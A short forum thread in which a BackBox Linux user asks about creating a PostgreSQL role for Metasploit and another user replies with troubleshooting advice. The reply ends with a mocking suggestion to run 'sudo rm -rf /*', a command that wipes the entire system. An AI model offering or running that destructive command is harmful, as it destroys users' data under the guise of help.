[SOLVED] How to Metasploit with postgresql

Started by cephen, September 23, 2015, 09:26:06 AM

Previous topic - Next topic

cephen

WIKI:
postgres@backbox:~$ createuser -D -P -R -S backbox
Enter password for new role: backbox
Enter it again: backbox

MY BACKBOX:
postgres@backbox:/home/user$ createuser -D -P -R -S backbox
could not change directory to "/home/user": Permission denied
Enter password for new role: backbox
Enter it again: backbox
createuser: creation of new role failed: ERROR:  role "backbox" already exists

??? ??? ???

ZEROF

Hi,

You don't need to do that. Just run msf and check if you are connected to postgresql (db_status). And you are done. If not check if postgresql is running.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*